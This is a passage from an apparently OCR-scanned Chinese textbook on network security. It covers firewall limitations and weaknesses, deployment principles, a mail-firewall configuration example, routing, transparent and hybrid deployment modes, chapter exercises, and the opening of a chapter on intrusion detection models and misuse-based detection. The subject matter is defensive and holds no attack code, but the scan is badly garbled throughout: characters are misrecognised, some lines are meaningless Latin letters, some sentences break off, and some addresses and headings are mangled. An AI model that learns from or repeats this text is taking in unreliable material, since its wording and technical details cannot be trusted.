(6) 防火 墙 不 能 阻止 攻击 者 对 允许 外 部 访问 的 端口 和 相应 的 协议 进行 攻击 ,借助 于 系 
统 漏洞 ,攻击 者 依然 可 能 通过 有 限 的 端口 和 协议 对 防火 墙 内 的 服务 硕 进 行 攻 击 。 

(7) 即使 在 网 关 位 置 使 用 了 具有 碍 杀 恶 意 程序 的 反 病 毒 软 件 ,防火墙 也 不 能 阻止 病毒 、 

(8) 防火 墙 不 能 防止 数据 驱动 式 的 攻击 。 当 茶 些 看 似 无 害 的 数据 进入 内 网 主机 中 并 被 
执行 时 ,就 有 可 能 发 生 数据 驱动 式 攻 击 。 

(9) 防火 墙 不 能 阻止 内 部 泄密 行为 。 对 于 合法 用 户 的 主动 泄密 行为 ,防火 墙 无 法 进行 
排查 。 

(10) 防火 墙 不 能 防止 针对 其 自生 的 汤 洞 攻击 行为 。 防 火 墙 能 够 通过 监测 协议 及 数据 
流量 的 方式 保护 网 内 的 计算 机 ,但 针对 其 月 身 漏 洞 的 攻击 依旧 可 能 使 得 防火 场 失 将, 甚至 能 
够 舍 助 防火 墙 对 网 内 计算 机 进行 攻击 。 

2. 防火 墙 的 脆弱 性 

(1) 防火 场 中 的 操作 系统 存在 脆弱 性 。 由 于 防火 场 的 功能 均 基 于 其 操作 系统 ,因此 如 
果 防 火 墙 中 的 操作 系统 存在 漏洞 ,将 会 影响 防火 墙 的 使 用 。 

(2) 防火 墙 人 硬件 的 脆 罚 性 。 便 件 产 品 在 使 用 过 程 中 老化 ,有 可 能 使 防火 墙 在 使 用 过 程 

(3) 防火 墙 软件 目 喘 的 用 弱 性 。 防 火 墙 软件 同样 可 能 存在 漏洞 ,并 被 攻击 者 利用 。 

(4) 通信 协议 的 脆弱 性 。 基 于 特定 通信 协议 的 防火 墙 并 不 能 有 效 杆 绝 基 于 通信 协议 漏 
洞 的 攻击 。 

(5) Bj sr E AS Jg BE Ff s TE. Dj Sit RP Ae BE E ARR NE BITRATE ILE I E EGER 
略 的 漏洞 都 将 被 拦截 或 转发 ,防火 墙 无 法 识别 其 流量 来 源 属 于 攻击 者 还 是 管理 员 。 

(6) 防火 墙 的 功能 性 和 安全 性 成 有 反比。 防火 墙 功 能 越 多 ,所 载 入 的 模块 就 越 多 ,那么 也 
就 可 能 引入 更 多 软件 及 协议 上 的 漏洞 ,因此 防火 墙 的 配置 应 该 遵循 最 小 功能 厚 则 。 

(7) 防火 墙 的 啊 应 速度 和 安全 性 成 反比 。 防 火 墙 的 安全 性 是 基于 对 流量 检测 上 的 安全 
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性 ,对 流量 进行 更 多 的 安全 性 检测 ,防火 墙 的 啊 应 速度 会 更 慢 , 反 之 亦 反 。 

(8) 防火 墙 的 功能 性 与 啊 应 速度 成 反比 。 防 火 墙 载 入 模块 越 多 ,请 耗 的 CPU 资源 及 内 
存 就 越 多 ,同样 也 会 影响 防火 墙 的 啊 应 速度 。 

(9) 防火 墙 无 法 保证 策略 准许 的 服务 的 安全 性 。 害 理 员 通过 配置 防火 墙 准许 攻 些 特定 
的 服务 的 流量 通过 防火 墙 ,但 是 防火 墙 无 法 保证 该 服务 的 安全 性 。 服 务 的 安全 性 只 能 由 服 
FHEA HITA. 


13.6 ”防火墙 部 署 过 程 与 典型 应 用 模式 


13.6.1 防火 墙 部 署 的 基本 方法 与 步骤 


1. 防火 墙 的 部 署 原 则 

防火 墙 部 署 的 基本 原则 : 只 要 有 恶意 侵入 的 可 能 ,无 论 是 内 部 网 络 还 是 与 外 部 公 网 的 
连接 处 ,都 应 该 有 所 考虑 或 侧重 。 

D REME 

Sh ab Be str Je: Wi XK Sit a A PIT BES 18H] Be A A a TA De a TE VJ BD 28 5 
外 部 Internet 的 网 关 处 ; 其 次 ,考虑 到 企业 内 部 网 络 规 模 较 大 ,并 部 署 VLAN 的 情况 ,应当 
在 各 个 VLAN lil tfr B; Jc up; 最 后 ,通过 公共 网 络 相 连 的 总 部 与 分 支 机 构 之 间 也 需 
要 部 署 防火 墙 , 在 条 件 允 许 的 情况 下 ,应 当 在 总 部 与 分 支 机 构 之 间 建 立 VPN 对 流量 进行 
加 密 。 

2) 可 靠 性 和 基本 功能 

自 先 ,防火 墙 本 号 应 该 是 安全 可 信和 的 , 即 防火 墙 能 够 有 效 地 阻挡 外 部 入 侵 。 决 菏 人 员 在 
选择 防火 墙 产 品 时 ,应 该 尽量 选择 占 市 场 份额 较 大 同时 又 通过 了 权威 认证 机 构 认 证 测试 的 
产品 ,以 避免 不 必要 的 损失 。 

其 次 ,防火 墙 应 当 遵循 “明确 允许 ,否则 禁止 ?的 设计 策略 。 在 网 络 安全 策略 改变 时 ,只 
需要 对 新 添加 的 服务 进行 授权 ,对 需要 每 止 的 服务 取消 授权 。 这 样 的 设计 策略 所 具有 的 灵 
活性 能 够 在 管理 员 对 网 络 进行 配置 时 得 到 充分 的 体现 ,尤其 是 在 网 络 规模 庞大 、 网 络 服务 较 
多 的 情况 下 ,这 种 设计 策略 的 优势 将 更 为 明显 。 

3) 防火 墙 部 署 .维护 和 扩充 成 本 

首先 ,购买 及 实施 菜 种 解决 方案 的 总 成 本 是 量化 评 佑 该 种 方案 的 重要 参考 因素 之 一 。 
例如 ,决策 者 应 当 根 据 公司 现今 的 财务 实力 ,以 及 预 拨付 给 网 络 安全 防护 的 费用 总 额 来 决定 
使 用 何 种 产品 ,高 端 商用 防火 墙 的 总 价 可 能 达到 10 万 美元 以 上 ,而 低 端 解决 方案 中 的 防火 
墙 产品 本 号 可 能 是 免费 的 ,因此 ,应 当 在 成 本 允许 的 情况 下 ,总 的 购买 及 实施 成 本 应 当 不 超 
过 所 保护 的 网 络 可 能 遭受 的 最 大 损失 。 以 一 个 非 关 键 部 门 的 网 络 防护 系统 为 例 ,如 果 该 系 
统 中 的 所 有 信息 及 其 部 署 应 用 的 总 价值 不 超过 10 万 美元 ,那么 在 该 网 络 中 部 署 防 火 墙 及 其 
配套 设置 的 总 成 本 也 不 应 超过 10 万 美元 。 但 对 于 关键 部 门 来 说 ,由 于 公司 业务 主体 来 自 关 
刍 部 门 , 因 此 应 当 允 许 实 施 成 本 超过 总 价值 的 解决 方案 。 同 时 ,人 员 培 训 和 日 党 维护 费用 也 
应 当 计 算 在 实施 成 本 之 内 ,而 不 能 简单 地 计算 购买 硬件 的 成 本 。 

其 次 ,防火墙 本 身 应 该 是 安全 可 信和 可 扩充 的 , 即 防火 墙 能 够 有 效 地 阻挡 外 部 人 侵 , 具 
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备 低 扩 充 成 本 。 决 策 人 员 在 选择 防火 墙 产 品 时 ,应 该 尽量 选择 占 市 场 份额 较 大 同时 又 通过 
了 权威 认证 机 构 认 证 测试 的 产品 ,以 避免 不 必要 的 损失 。 好 的 产品 应 该 留 给 用 户 足 够 的 弹 
orien —— nena 
应 用 的 增加 ,网络 的 风险 成 本 急剧 上 升 ,用 户 应 当 进 一 步 增 加 选择 的 余地 。 

4) 体现 企业 的 系统 战略 ， iv 和 sen 

管理 员 应 当 了 解 安装 防火 墙 的 目的 是 为 了 明确 地 阻止 一 切除 连接 到 网 络 的 授权 服务 之 
外 的 所 有 服务 ,或 者 是 为 对 所 有 网 络 访问 进行 计量 和 审计 的 ,而 不 是 机 械 地 完成 某 项 任务 ， 
倘 春 如 此 ,防火 墙 的 最 终 功能 将 可 能 成 为 行政 上 的 结果 ,而 不 是 工程 上 的 决策 。 

防火 墙 的 监视 .元 余 度 及 控制 水 平 是 需要 进行 定义 的 。 通 过 企业 系统 策略 的 设计 ,网 管 
要 确定 企业 可 接受 的 风险 水 平 (偏执 到 何 种 程度 ) 。 接 下 来 列 出 一 个 必须 监测 什么 传输 、 必 
须 人 允许 什么 传输 通行 ,以 及 应 当 拒 绝 什 么 传输 的 清单 。 也 就 是 说 ,管理 员 开 始 时 先 列 出 总 体 
目标 ,然后 把 需求 分 析 与 风险 评估 结合 在 一 起 , 挑 出 与 风险 始终 对 立 的 需求 ,加 入 到 计划 完 
成 的 工作 清单 中 。 

5) 重新 审视 网 络 设计 的 目的 

出 于 可 用 性 的 目的 ,企业 一 般 关 心 的 是 路 由 器 与 月 吴 网络 内 的 路 由 服务 ,因此 ,技术 上 
仍 需 要 进行 多 项 决策 ,如 路 由 服务 中 的 路 由 过 滤 功 能 是 在 IP 层 实现 还 是 通过 代理 网 关 和 服 
务 在 应 用 层 实现 。 

管理 员 需 要 诀 策 的 是 ,是 否 通过 又 露 在 外 部 网 络 中 的 代理 机 对 内 部 网 络 中 的 Telnet, 
FTP, News 等 进行 访问 ,还 是 通过 设置 路 由 器 上 的 过 滤器 ,允许 特定 的 一 台 或 多 台 计 算 机 
与 服务 进行 通信 。 两 种 方式 都 存在 着 自身 的 优 缺 点 ,代理 机 方式 可 以 显著 提高 审计 水 平 , 防 
止 潜 在 的 安全 性 风险 ,但 同时 也 增加 了 部 署 费 用 ,降低 了 服务 水 平 。 

2. BASH aS Ais 

Bij Jc 38 “AY Ap ZEA ub eR 55 P a Pd 8 3E Beh AA SE BT TH A zz RI VES SE Pd $8 AP [n] x 
全 区 域 之 间 以 形成 不 同安 全 区 域 `. 内 外 网 之 间 的 逻辑 隔离 .访问 控制 和 审计 。 

1) 内 部 网 络 不 同安 全 区 域 部 署 

在 内 部 网 络 中 ,不 同 的 安全 区 域 之 间 的 防护 等 级 是 不 一 样 的 。 例 如 ,关键 部 门 的 防护 等 
级 将 高 于 非 关 键 部 门 。 内 部 网 络 中 部 署 的 防火 墙 将 内 部 网 络 隔离 成 两 个 不 同 的 子 网 ,其 中 
一 个 子 网 作为 被 防护 的 对 象 , 另 一 个 作为 防护 对 象 。 

2) 相关 部 门 出 人 口 部 署 

为 了 保护 内 部 网 络 与 相关 服务 系统 之 间 的 安全 , 通 笛 在 内 部 网 络 与 相关 服务 的 连接 
处 部 署 防火 墙 ,将 网 络 划 分 为 3 个 不 同 的 安全 区 域 : 内 部 网 络 是 防火 墙 需要 保护 的 区 域 ; 
外 部 网 络 是 防火 墙 需要 防护 的 区 域 ; DMZ 区 域 用 来 放置 同时 对 内 对 外 提供 信息 服务 的 
He FF Hit 

3) Internet HAH WF 

为 保障 内 部 网 和 网 站 服务 系统 的 安全 ,可 在 内 部 网 与 Internet 网 络 的 连接 处 部 署 非 军 
事 化 区 结构 的 三 层 防 火 墙 。 为 获得 更 高 的 安全 性 ,可 采用 不 同 厂家 的 防火 墙 实 施 多 级 防护 ， 
对 外 信息 服务 区 到 Internet 的 边界 布置 防火 墙 1 ; 在 内 部 网 到 对 外 信息 服务 区 的 边界 布置 
防火 墙 2。 在 访问 策略 上 ,对 外 信息 服务 区 即 为 DMZ 区 。 

为 了 避免 单 点 故障 ,网 络 设备 应 当 使 用 元 余 设 计 , 而 防火 墙 也 应 当 使 用 元 余 配 置 。 此 
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外 ,还 应 当 部 署 啊 应 的 防火 墙 日 志 服 务 器 、 防 火 墙 控 制 台 ,方便 对 整个 网 络 中 的 防火 墙 的 运 
行进 行 管理 和 监控 。 

3. 防火 墙 部 署 步骤 

以 邮件 防火 墙 为 例 , 该 防火 墙 在 网 络 中 的 作用 相当 于 一 个 邮件 中 转 服务 器 ,不 仅 转 发 从 
互联 网 癌 内 部 邮件 服务 器 发 送 的 邮件 ,同时 也 转发 内 部 邮件 服务 絮 癌 互联 网 发 送 的 邮件 ,从 
而 实现 双 回 过 滤 邮 件 ,并 保障 邮件 服务 硕 安 全 。 

采用 该 方案 具有 通用 性 强 的 特点 ,可 以 文 持 任 意 使 用 SMTP 协议 的 邮件 系统 ,同时 ,该 
防火 墙 在 配置 时 应 当 注 意 以 下 两 点 。 

(1) 必须 截获 所 有 通过 外 部 系统 癌 内 部 邮件 服务 大 发 送 的 邮件 。 

(2) 必须 转发 所 有 从 内 部 用 户 发 送 至 外 部 网 络 的 邮件 系统 的 邮件 。 

为 了 实现 以 上 两 点 要 求 , 可 以 将 DNS 记录 指 回 邮件 防火 墙 , 同 时 将 邮件 防火 墙 的 
SMTP 转发 路 由 设置 为 受 保护 的 内 部 邮件 服务 器 ,最 后 在 通知 所 有 用 户 将 SM TP 发 信服 务 
右 设 置 为 邮件 防火 墙 。 目前 的 实验 环境 如 图 13-18 所 示 。 

邮件 服务 器 





路 由 | Ks 
Weblli 25 á 


图 13-18 RHA PE p Fe BIB TE Dj I dh Fh 


D SEA 

整个 系统 所 在 域 为 test. XXX. net, 

DNS 服务 器 IP: 192. 168. 4. 8。 

E-mail 服务 器 IP: 192. 168. 8. 8, 

邮件 防火 墙 IP: 192.168. 10. 8. 

2) HA DE 2b JR 

(1) DNS 服务 器 中 记录 的 修改 。 该 步骤 的 主要 目的 是 截获 所 有 内 部 用 户 发 往外 部 邮 
件 服务 需 的 邮件 ,以 及 截获 从 外 部 邮件 服务 需 发 往 内 部 邮件 服务 需 的 邮件 。 可 以 将 原 有 邮 
件 服务 器 所 在 的 域 (test. xxx. net) 中 对 应 的 DNS 服务 器 (192. 168. 4.8) 中 的 记录 修改 为 邮 
件 防 火 墙 的 地 址 (192. 168. 10. 8) 。 

(2) 邮件 防火 墙 转 发 路 由 的 设置 。 修 改 邮 件 防火 墙 中 SMTP 服务 代理 模块 的 路 申 转 
发 ,将 其 指 回 将 要 保护 的 内 部 邮件 服务 冀 的 地 址 (192. 168. 8. 8) 。 

(3) 邮件 用 户 客户 端的 设置 。 在 这 里 受 保护 的 内 部 邮件 服务 器 的 域 中 的 邮件 客户 端 必须 
还 是 将 邮件 接收 的 POP3 服务 器 和 发 送 的 SMTP 服务 器 设置 为 原 有 的 邮件 服务 器 (168,，2. 2. 3)， 

当 完 成 以 上 三 步 设 置 后 ,邮件 防火 场 的 部 普 就 完成 了 。 这 样 部 普 的 好 处 在 于 在 实现 邮 
件 截获 的 同时 ,还 为 受 保 护 的 内 部 邮件 服务 器 提供 了 备份 功能 ,一 旦 邮件 防火 墙 遭 到 攻击 ， 
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内 部 邮件 服务 硕 仍 然 可 以 为 用 户 提 供 服 务 ,并 且 该 方案 适用 于 不 同 的 邮件 服务 天 , 可 以 文 持 
UNIX, Windows 等 平台 下 不 同 的 邮件 系统 ,实现 了 对 邮件 服务 大 操作 系统 的 无 关 性 。 部 署 
T ARRI As B AA cz TE a 13-19 所 示 。 






>< 
< mk a 


防 KK Ii Web 服 务 器 
图 13-19 ”邮件 防火 墙 部 署 结构 图 


13.6.2 防火墙 典型 部 署 模式 


1. 防火 墙 部 署 模式 

目前 ,防火 墙 都 支持 3 种 部 署 模式 : 路 由 模式 、 透 明 模 式 和 混合 模式 。 这 3 BUB CI 
了 任何 环境 下 对 防火 墙 部 署 的 要 求 , 并 能 够 保证 防火 墙 在 各 种 模式 下 ,各 项 功能 得 到 全 面 的 
发 挥 。 下 面 分 别 对 这 3 种 模式 进行 说 明 。 

1) 路 由 模式 

在 路 由 模式 下 ,防火墙 需要 配置 相应 的 路 由 规则 ,参与 并 接 入 网 络 路 由 。 因 此 ,如 果 是 
在 现 有 的 网 络 上 采用 路 由 模式 部 署 防火 墙 , 可 能 涉及 调整 现 有 网 络 结构 或 网 络 上 路 由 设备 、 
交换 设备 的 IP 地 址 或 是 路 由 指 回 问 题 , 同 时 要 考虑 防火 墙 部 署 位 置 的 关键 性 ,是 否 需 要 防 
火 墙 的 元 余部 署 。 

在 路 由 模式 下 ,防火墙 所 有 接口 均 需 要 配置 IP 地 址 ,并 需要 根据 网 络 结构 情况 ,在 防火 
墙 的 路 由 表 内 添加 相应 的 路 由 规则 ,同时 其 他 连接 防火 墙 的 路 由 设备 需要 编写 指 问 防火 墙 
的 路 由 策略 。 图 13-20 所 示 为 一 个 三 网 口 纯 路 由 模式 的 部 署 。 该 模式 适用 于 各 种 中 小 规模 
的 网 络 。 


EE fh YY 
LI 





172.16.1.11 
fs) 
172.16.1.12 


图 13-20 BR e A oO Ab i p RS E] 
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图 13-20 为 一 个 具有 3 个 区 段 的 小 型 网 络 。Internet 区 段 的 网 络 地 址 是 202. 100. 100. 0. 
DMZ 区 段 的 网 络 地 址 是 172. 16. 1.1, 内 部 网 络 区 段 的 网 络 地 址 是 192. 168. 1. 0。 


Web 服务 器 的 地 址 是 172. 16. 1. 10 ,端口 是 80; 邮件 服务 器 的 地 址 是 172. 16. 1. 11 , 端 


口 是 25 和 110; FTP 服务 天 的 地 址 是 172. 16. 1. 12. HO Æ 21. 
安全 策略 的 默认 策略 是 禁止 。 人 允许 内 部 网 络 区 段 访 问 DMZ 网 络 区 段 和 Internet K Ez 


的 HTTP,SMTP,POP3,FTP 服务 ; 允许 Internet 区 段 访 问 DMZ 网 络 区 段 的 服务 器 。 其 


他 的 访问 都 是 禁止 的 。 

2) 透明 模式 

透明 模式 , 即 用 户 无 法 感知 防火 墙 的 存在 。 使 用 透明 模式 ,用 户 不 需要 重新 设置 和 修改 
路 由 ,防火 墙 可 以 直接 安 流 到 网 络 中 进行 使 用 ,如 图 13-21 所 示 。 


Qee Internet 






201.100.100.100 


201.100.100.101 
L E 
| 3] 201. 100.100.102 


201.100.100.100~150 


201.100.100.1~50 
图 13-21 防火墙 三 网 口 透 明 模 式 部 署 图 


3) 混合 模式 

如 果 防 火 墙 既 存 在 工作 在 路 由 模式 的 接口 (接口 具有 IP 地 址 ) ,又 存在 工作 在 透明 模式 
的 接口 (接口 无 IP He Hb) , 则 防火 墙 工 作 在 混合 模式 下 。 

图 13-22 所 示 为 一 个 具有 3 个 区 段 的 网 络 。 其 中 , Internet 区 段 的 网 络 地 址 是 
201. 100. 100. 0 ,内 部 网 络 区 段 的 IP 地 址 是 10. 10. 10. 2 到 10. 10. 10. 50; DMZ 网 络 区 段 的 
IP 地 址 是 10. 10. 10. 100 到 10. 10. 10. 150, 


IBERE 
Lae ee 
^N ei 





10.10.10.100—150 


pots fay 
= | 


n 10.10.10.102 


[0.10.10.2-10.10.10.50 
图 13-22 防火 墙 三 网 口 混合 模式 部 署 图 
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13.7 本章 小 结 


本 章 详细 介绍 了 防火 墙 的 工作 机 制 、 核 心 技术 、 分 类 .防御 体系 结构 类 型 .主要 技术 参数 
及 产品 类 型 等 内 容 , 并 结合 实例 详细 分 析 了 防火 坪 部 团 的 基本 方法 .步骤 及 其 部 署 模 陈 。 


习题 13 


1. 包 过 滤 防 火 墙 利用 了 数据 包 的 五 元 组 信息 ,五 元 组 信息 的 内 容 包 括 哪些 ? 
2. 应 用 服务 代理 防火 墙 技 术 中 ,应 用 服务 的 作用 是 什么 ? 
3. 双 适 主 主机 防火 墙 的 体系 结构 是 什么 样 的 ,完成 双 和 窜 主 主机 防火 墙 需 要 怎样 的 人 硬件 


4. 简 述 防火 墙 的 性 能 指标 和 安全 指标 都 包含 哪些 内 容 ? 

5. 简 述 软件 防火 墙 、 便 件 防 火场 和 工业 标准 服务 需 形 式 防 火 墙 的 区 别 。 
6. 试 按照 13.5.2 节 提 示 ,手动 配置 开源 防火 墙 。 

7. fn] 3h Dj K Hei HJ Jed Bi HE ? 

8. iB Hl Bj hat =) E 5 B EX ET E — 1 PIA a AT. 


CHAPTER M 


入 侵 检测 的 原理 及 应 用 第 14 章 


14.1 人 入侵 检测 概述 


在 网 络 系统 安全 领域 ,用 户 或 恶意 软件 引起 的 人 侵 攻 击 是 一 个 重要 的 安 
全 议题 。 用 户 可 通过 授权 用 户 使 用 超出 授权 范围 的 权限 或 未 授权 登录 计算 
机 的 方法 实施 人 侵 攻 击 。 攻 击 肴 也 可 通过 蠕虫、 病毒 、. 木马 等 恶意 软件 对 系 

未 授权 登录 计算 机 系统 或 网 络 是 计算 机 安全 领域 最 严重 的 威胁 之 一 。 
安全 从 业 人 员 通 过 人 研发 人 侵 检 测 系 统 , 使 得 系统 可 以 在 早期 提供 入 侵 堵 报 ， 
以 便 采 取 防 护 措 施 减 少 相 关 损 失 。 和 人 侵 检 测 系 统 主 要 通过 检测 非 正 常 行为 
方式 和 已 和 和信 侵 行为 两 种 方式 来 实现 人 侵 检 测 功能 。 


14.1.1 Ag JU 3s NES SR 


随 看 计算 机 网 络 的 飞速 发 展 ,网 络 通信 已 经 渗透 到 社会 经 济 、 文 化 和 科 
学 的 各 个 领域 。 对 人 类 社会 的 进步 和 发 展 起 着 举足轻重 的 作用 , 它 正 影响 和 
改变 着 人 们 工作 .学习 和 生活 的 方式 。 态 外 ,互联 网 的 发 展 和 应 用 水 平 也 已 
经 成 为 衡量 一 个 国家 实力 的 标准 之 一 ; 发 展 网 络 技术 是 国民 经 济 现代 化 建设 
不 可 缺少 的 必要 条 件 。 网 络 使 得 信息 的 获取 ,传递 存储、 处 理 和 利用 变 得 更 
加 有 效 、 迅 速 , 网 络 带 给 人 们 的 便利 比比 丝 是 ,但 是 也 带 来 了 安全 隐患 ,如 次 
走 用 户 的 重要 文件 ,隐私 或 使 用 户 的 计算 机 系统 次 痪 。 所 以 ,人 研究 安全 技术 
是 很 重要 的 课 匮 。 现 在 安全 拉 术 日 益 发 展 起 来 ,如 杀毒 软件 防火 墙 、 数 据 加 
A 虚拟 专用 网 络 (Virtual Private Network. VPN) . 数 宇 签名 和 刁 份 认证 等 
技术 。 但 是 随 看 黑客 技术 的 发 展 , 这 些 传 统 的 安全 技术 已 经 不 能 满足 现在 的 
安全 需求 了 。 例 如 ,虽然 防火 墙 提 供 了 号 份 认证 和 访问 控制 ,但 是 它 不 能 防 
止 绕 过 防火 墙 的 攻击 ,入 侵 痢 可 以 利用 脆弱 性 程序 或 系统 涯 洞 绕 过 防火 墙 的 
访问 控制 来 进行 非法 攻击 。 

传统 的 和 人 侵 检测 系统 中 一 般 灯 用 模式 匹配 报 术 ,对 安全 事件 进行 分 析 ， 
然后 将 分 析 结果 与 设置 好 的 人 侵 规 则 进行 匹配 。 传 统 的 匹配 方法 是 对 网 络 
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的 数据 包 进 行 分析 ,将 包头 的 字符 与 攻击 行为 的 特征 字符 进行 比较 。 这 种 逐 字 和 匹配 方法 
具有 两 个 最 根本 的 缺陷 ,分 别 是 计算 负载 大 和 探测 不 够 灵活 。 面 对 近 几 年 不 断 出 现 的 高 速 
网 络 应 用 ,实现 实时 人 侵 检 测 也 成 为 一 个 哎 行 解决 的 问题 。 但 是 ,协议 分 析 能 够 智能 地 分 析 
理解 协议 ,这 样 的 优 反 台 是 城 少 了 字符 匹配 规则 的 运算 量 , 从 而 提 局 了 入 侵 检 测 的 效率 。 所 
以 说 研究 基于 协议 分 析 的 人 侵 检 测 技术 具有 很 蝇 的 现实 意义 。 


14.1.2 入 侵 检 测 技术 模型 


最 早 的 入 侵 检 测 技 术 模 型 由 Dorothy Denning 提出 ,检测 技术 及 检测 拉 术 体系 都 是 在 
Denning 提出 的 模型 基础 上 进行 的 扩展 和 细 化 ,模型 如 图 14-1 所 示 。 入 侵 检 测 系 统 时 刻 对 
安全 事件 进行 监视 ,并 且 将 它 与 人 侵 检 测 系 统 的 规 
则 进行 匹配 ,从 而 可 以 识别 出 具有 攻击 性 的 事件 并 
及 时 阻止 ,并 可 以 按照 一 定 的 时 间 规 则 日 动 地 删 减 
规则 库 中 的 规则 集合 。 
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14.1.3 人 入侵 检测 技术 的 现状 及 发 展 


随 独 用 户 需 求 的 不 断 变化 , 镶 能 设备 的 普及 , 计 
算 机 技术 的 传播 ,网络 空间 的 范围 逐渐 扩大 ,具有 计 审计 记录 /网 络 数据 包 / 应 用 程序 日 志 





算 机 知识 背景 的 安全 从 业 人 员 不 断 增 多 。 网 络 人 侵 图 14-1 人 入侵 检测 技术 模型 


的 攻击 手段 不 断 升 级 变化 。 入 侵 行 为 不 断 更 新 , 问 
以 下 几 个 方面 发 展 。 

(D 实施 入 侵 行为 的 主体 隐蔽 化 。 攻 击 者 可 以 通过 一 定 的 技术 ,掩盖 攻击 主体 的 地 址 
和 主机 信息 。 这 样 在 检测 到 入 侵 攻 击 后 无 法 确定 基 实 的 攻击 者 信息 。 

(2) 入 侵 行为 的 规模 扩大 。 在 早期 的 网 络 世 界 中 ,对 于 网 络 的 入侵 和 攻击 主要 针对 于 
公司 或 网 站 ,攻击 目的 基于 网 络 技术 人 员 的 爱好 .商业 盗 入 行 为 .恶意 破坏 等 。 伴 随 互 联网 
技术 的 普及 ,用 户 对 于 网 络 技术 的 依赖 性 越 来 越 强 ,网 络 空间 扩展 为 新 的 战场 ,信息 战 的 概 
念 锌 提出 。 恶 意 和 人 侵 行 为 已 从 个 人 行为 扩展 到 国家 行为 层面 。 

(3) 入 侵 行为 实施 的 分 布 化 。 在 以 往 的 入侵 攻击 中 ,攻击 者 大 多 单机 执行 攻击 行为 。 


伴随 网 络 终 闯 数目 的 不 断 增 加 和 网 络 的 普及 ,分 布 式 的 人 侵 行 为 成 为 一 种 新 的 人 侵 攻 击 
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(4) 基于 攻击 防护 系统 的 人 侵 行 为 。 入 侵 少 通 第 卫 接 利用 目标 系统 的 脆弱 性 对 系统 实 


施 攻 击 。 但 近期 来 的 攻击 行为 却 发 生 策 略 性 改变 ,通过 攻击 网 络 的 防护 系统 实施 入 侵 行为 ， 


且 有 合演 合 烈 的 趋势 。 攻 击 者 通过 详细 的 分 析 IDS 的 审计 方式 ,特征 描 述 、 通 信和 模式 找 出 
IDS 的 弱点 ,从 而 实施 攻击 行为 。 

(5) 攻击 者 的 入 侵 和 攻击 呈 综 合 化 与 复杂 化 。 早 期 入 侵 攻 击 中 ,入 侵 者 往往 只 采用 一 
种 攻击 手段 。 但 当前 由 于 网 络 防范 措施 的 多 重 化 ,增加 了 攻击 难度 ,使 得 人 侵 者 在 实施 人 侵 
行为 时 需要 同时 采用 多 种 入 侵 手 段 ,以 达到 保证 人 侵 的 目的 ,并 可 以 在 攻击 实施 的 初期 掩 冀 
攻击 或 人 侵 的 真实 目的 。 

(6) 伴随 入 侵 技 术 的 演化 与 发 展 。 入 侵 检 测 技 术 从 规模 上 和 方法 上 近年 来 也 发 生 了 改 
变 。 人 侵 技 术 的 发 展 与 演化 会 问 以 下 方面 发 展 。 
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CD 智能 化 的 入 侵 检 测 ,即使 用 智能 化 的 方法 与 手段 来 进行 人 侵 检 测 。 所 谓 的 智能 化 方 
法 ,主要 基于 算法 层面 ,通过 使 用 神经 网 络 .模糊 技术 .遗传 算法 及 专家 系统 的 思想 等 方法 ， 
用 于 识别 人 侵 特 征 。 

(2) 检测 分 布 式 攻击 ,伴随 人 侵 行 为 的 分 布 式 实施 ,人 侵 检 测 系统 需要 完成 对 于 分 布 式 
攻击 的 检测 。 这 需要 不 同 世 点 的 监控 设备 实现 协同 工作 。 

O 实施 安全 防御 方案 ,使 用 安全 工程 风险 管理 的 思想 与 方法 来 处 理 网 络 安全 问题 ,将 
网 络 安全 作为 一 个 整体 工程 。 从 管理 .网 络 结构 等 方面 部 署 安 全 方案 。 和 人 侵 检 测 系 统 中 加 
入 秘密 通道 赋 究 .病毒 防护 的 子 系统 ,达到 入 侵 检 测 可 从 多 方位 对 当前 的 网 络 做 出 全 面 的 评 
fh ,然后 提出 可 行 的 全 面 解决 方案 。 


14.2 和 信 侵 检测 技术 


14.2.1 基于 误 用 的 入 侵 检 测 技术 


误 用 入 侵 检测 对 某 类 特定 入 侵 的 行为 模式 进行 编码 记录 ,首先 建立 误 用 模式 库 ; 然后 
再 对 审计 事件 数据 与 匹配 规则 进行 匹配 ,当然 其 缺陷 是 不 能 检测 到 未 知 的 攻击 模式 而 只 能 
检测 已 知 的 攻击 模式 。 篆 见 的 误 用 人 侵 检 测 技术 包括 以 下 几 种 。 

1. 模式 匹配 

模式 匹配 的 特点 是 扩展 性 好 原理 简单 .可 以 实时 检测 检测 效率 高 ; 但 基于 模式 匹配 
的 误 用 检测 技术 只 能 适用 于 防范 比较 简单 的 攻击 方式 。 模 式 匹 配 的 原理 是 将 收集 到 的 安全 
事件 与 已 和 的 匹配 规则 进行 比较 ,进而 发 现 违 痛 设 定 安全 开 略 的 相关 入 侵 行 为 。 早 期 基于 
误 用 模式 的 人 侵 检 测 工 具 包 括 snort, 下 文中 将 对 snort 工具 进行 简要 介绍 。 

2. 专家 系统 

专家 系统 技术 即 根据 安 全 专家 对 可 疑 行为 的 分 析 经 验 来 形成 一 套 推 理 规 则 ,在 推理 规 
则 的 基础 上 建立 相应 的 专家 系统 来 自动 对 所 涉及 的 入 侵 行为 进行 分 析 , 所 以 专家 系统 具有 
自我 学 习 的 功能 。 专 家 系统 方法 存在 以 下 实际 问题 : 如 果 在 系统 工作 中 人 处理 海量 数据 时 存 
在 明显 的 效率 问题 ,因为 专家 系统 是 使 用 解释 性 语言 来 实现 的 ,所 以 执行 速度 有 目 然 就 比 编译 
型 语言 要 慢 。 此 外 ,专家 系统 的 推理 与 日 我 学 习 的 规则 比较 复兴 ,而且 比较 难以 维护 。 

3. 状态 迁移 法 

状态 迁移 法 的 作用 就 是 描述 系统 的 状态 及 所 可 能 的 状态 之 间 的 转移 。 在 进行 入侵 检测 
时 ,状态 迁移 法 就 可 以 把 系统 从 合法 状态 到 危险 状态 的 行为 动作 表示 出 来 。 

状态 迁移 法 具有 极 强 的 健壮 性 ,因为 对 于 未 知 的 检测 的 特征 ,状态 迁移 图 的 处 理 方式 
就 是 踢 调 系统 正在 处 于 多 攻击 状态 而 不 是 未 知 审计 特征 ; 而 且 它 是 利用 系统 状态 的 变化 
对 最 原始 的 审计 事件 进行 抽象 ,这 可 以 减少 误 报 率 ,同时 也 是 一 种 新 的 检测 途径 。 另 外 ， 
状态 迁移 法 的 实现 涉及 比较 融 层 次 的 抽象 ,有 项 望 把 它 的 知识 库 移植 到 不 同 的 机 冀 、 网 
络 和 应 用 的 入 侵 检 测 上 。 但 是 ,这 也 有 一 个 缺点 ,就 是 受到 预先 定义 的 状态 迁移 序列 的 
束缚 太 大 ，。 
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14.2.2 基于 异 音 的 入 侵 检 测 技术 


